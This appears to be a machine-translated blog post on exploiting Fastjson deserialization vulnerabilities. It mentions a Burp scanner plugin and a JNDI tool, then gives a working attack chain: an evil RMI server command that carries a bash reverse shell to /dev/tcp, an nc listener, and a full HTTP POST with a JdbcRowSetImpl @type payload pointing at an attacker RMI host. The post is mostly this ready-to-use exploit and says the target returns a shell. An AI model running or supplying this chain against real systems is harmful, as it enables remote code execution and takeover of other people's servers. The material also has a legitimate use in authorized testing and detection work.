当前位置:网站首页>Fastjson vulnerability utilization techniques
Fastjson vulnerability utilization techniques
2022-06-24 16:08:00 【Bypass】
Every time I see json Data packets , Will inevitably think of Fastjson And vulnerabilities in multiple versions of it .
How to realize automatic detection and simplify attack steps , So as to improve the ability of vulnerability discovery , Make you more efficient Tips, Let's share with you .
01、 Automated vulnerability detection
Based on a BurpSuite Passive FastJson Test plug-in , This plug-in will help BurpSuite Coming in with json The request packet of data is detected .
Github Project address :
https://github.com/pmiaowu/BurpFastJsonScan
02、 Simplify attack steps
Here we can use a JNDI Service utilization tools , To simplify the fastjson Steps of vulnerability detection , Assist in vulnerability exploitation and penetration .
Github Project address :
https://github.com/wyzxxz/jndi_toolFstjson Exploit :
(1) Turn on RMI service
java -cp jndi_tool.jar jndi.EvilRMIServer 1099 8888 "bash -i >&/dev/tcp/xxxx.xxx.xxx.xxx/12345 0>&1"
(2) Set listening server
nc -lvvp 12345
(3) Construct request send payload
POST /login HTTP/1.1
Host: xxx.xxx.xxx.xxx
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 111
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://xxx.xxx.xxx.xxx:1099/Object","autoCommit":true}
(4) Target system received POST request , Successful rebound shell.
边栏推荐
- Global and Chinese market of music synthesizer 2022-2028: Research Report on technology, participants, trends, market size and share
- Wechat official account debugging and natapp environment building
- Global and Chinese market of training dance clothes 2022-2028: Research Report on technology, participants, trends, market size and share
- mysql时间戳格式转换日期格式字符串
- 国泰君安期货安全么?期货开户怎么开?期货手续费怎么降低?
- How to obtain ECS metadata
- 2021-04-24: handwriting Code: topology sorting.
- Nifi from introduction to practice (nanny level tutorial) - environment
- #夏日挑战赛# HarmonyOS - 实现带日期效果的待办事项
- Rush for IPO, Hello, I'm in a hurry
猜你喜欢

Understanding openstack network

CAP:多重注意力机制,有趣的细粒度分类方案 | AAAI 2021

几种常见的DoS攻击

Here comes Wi Fi 7. How strong is it?

存在安全隐患 部分冒险家混动版将召回

一文详解JackSon配置信息

Logging is not as simple as you think

【应用推荐】最近大火的Apifox & Apipost 上手体验与选型建议

一文理解OpenStack网络

The catch-up of domestic chips has scared Qualcomm, the leader of mobile phone chips in the United States, and made moves to cope with the competition
随机推荐
The equipment is connected to the easycvr platform through the national standard gb28181. How to solve the problem of disconnection?
【Prometheus】4. Monitoring cases
Global and Chinese market of insect proof clothing 2022-2028: Research Report on technology, participants, trends, market size and share
2021-04-28: force buckle 546, remove the box. Give some boxes of different colors
【云原生 | Kubernetes篇】Kubernetes基础入门(三)
Cap: multiple attention mechanism, interesting fine-grained classification scheme | AAAI 2021
MySQL Innodb和Myisam
A new weapon to break the memory wall has become a "hot search" in the industry! Persistent memory enables workers to play with massive data + high-dimensional models
Flink Kubernetes Application部署
用 Oasis 开发一个跳一跳(一)—— 场景搭建
Golang+redis reentrant lock
Detailed explanation of transpose convolution in pytorch
2021-05-02: given the path of a file directory, write a function
CAP:多重注意力机制,有趣的细粒度分类方案 | AAAI 2021
C. Three displays(动态规划)Codeforces Round #485 (Div. 2)
对深度可分离卷积、分组卷积、扩张卷积、转置卷积(反卷积)的理解
mysql时间戳格式转换日期格式字符串
SIGGRAPH 2022 | 真实还原手部肌肉,数字人双手这次有了骨骼、肌肉、皮肤
Cap: multiple attention mechanism, interesting fine-grained classification scheme | AAAI 2021
Nature刊登量子计算重大进展:有史以来第一个量子集成电路实现